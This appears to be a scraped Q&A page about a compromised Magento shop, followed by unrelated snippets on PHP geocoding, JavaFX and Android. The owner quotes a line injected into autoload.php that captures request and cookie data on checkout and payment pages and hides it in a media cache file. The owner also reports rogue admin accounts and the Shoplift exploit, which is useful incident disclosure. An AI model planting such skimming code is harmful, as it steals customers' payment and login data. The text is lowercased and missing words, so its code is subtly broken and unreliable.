magento - Mage PHP Notice: Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1 -


since morning i'm getting following php notice after running magento cronjob:

undefined index: request_uri in /htdocs/lib/varien/autoload.php on line 1

i did not modify of mage files.. how possible?

edit: i've edited autoload.php first check if request_uri set.

original:

<?php if(preg_match("/checkout|payment/", $_server["request_uri"]))

new:

<?php if(isset($_server["request_uri"]) && preg_match("/checkout|payment/", $_server["request_uri"]))

edit 30-04-2015:

after reading @volkan , @b.enoit.be comments i've replaced specified page original 1 magento , line indeed not present!.

the following malicious line present in autoload.php

<?php if(preg_match("/checkout|payment/", $_server["request_uri"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_request)."--".serialize($_cookie)). ":", file_append); }?>

i've checked:

  • /js/index.php same original
  • /index.php same original
  • magpleasure_filesystem module not present

however.. there 2 new admin-users had obscure names:

  • backup - auto_bc@magent.com <-- domain leads domain holding page , email gives russian results on google
  • database - db@local.host

both users have been deleted. website vulnerable tot shoplift exploit (which addressed in latest security-patch)

we're busy installing latest security patches.

it seems has been recent problem:

100,000 web shops open compromise attackers exploit magento bug magento shoplift bug tester v1.0

thanks users there help.

it looks page has been compromised, replace file original one, , install security patches magento. check if there new admin-users in backend, , module magpleasure_filesystem

check /js/index.php /index.php


Comments

Post a Comment

Popular posts from this blog

php - failed to open stream: HTTP request failed! HTTP/1.0 400 Bad Request -

this code i'm using find latitude , longitude of place: function coords($address){ echo $url="http://maps.googleapis.com/maps/api/geocode/json?address=".$address; $json = file_get_contents(urlencode($url)); $data = json_decode($json, true); print_r($data['results'][0]['geometry']['location']['lat']); print_r($data['results'][0]['geometry']['location']['lng']); } however returns warning: failed open stream: http request failed! http/1.0 400 bad request if use above code in simple procedure works fine not in function. note: have tried curl_init()... method produced same result? instead of encoding whole url encode address part. following code work fine $add='jamshoro phase 2'; $url="http://maps.googleapis.com/maps/api/geocode/json?address=".urlencode($add); $json = file_get_contents($url); $data = json_decode($json, true); print_r($data['r
Read more

java - How to filter a backspace keyboard input -

i have code gives message when key number pressed: txtvalueofclause.addeventfilter(keyevent.key_typed, new eventhandler<keyevent>() { @override public void handle(keyevent t) { char ar[] = t.getcharacter().tochararray(); char ch = ar[t.getcharacter().tochararray().length - 1]; if (!(ch >= '0' && ch <= '9')) { system.out.println("the char entered not number"); t.consume(); } } }); now if press on wrong button , press backspace remove it, error message. how can add backspace input if statement? i have found answer: txtvalueofclause.addeventfilter(keyevent.key_typed, new eventhandler<keyevent>() { @override public void handle(keyevent t) { char ar[] = t.getcharacter().tochararray(); char ch = ar[t.getcharacter().tochar
Read more

java - Show Soft Keyboard when EditText Appears -

i have code in android app, alert dialog , keyboard, , when dialog shown want keyboard appear. not , not sure why? here code: final alertdialog.builder alert = new alertdialog.builder(this); alert.settitle("title"); alert.setmessage("message"); final edittext input = new edittext(this); input.setinputtype(inputtype.type_class_number); alert.setview(input); input.setonfocuschangelistener(new view.onfocuschangelistener() { @override public void onfocuschange(view v, boolean hasfocus) { if (hasfocus) { log.i(tag, "in focus"); inputmethodmanager inputmethodmanager = (inputmethodmanager) getsystemservice(context.input_method_service); inputmethodmanager.showsoftinput(input, inputmethodmanager.show_implicit); } } }); but keyboard not appear though edit text in focus, , tell appear why, doesn't come up? thanks in advance.
Read more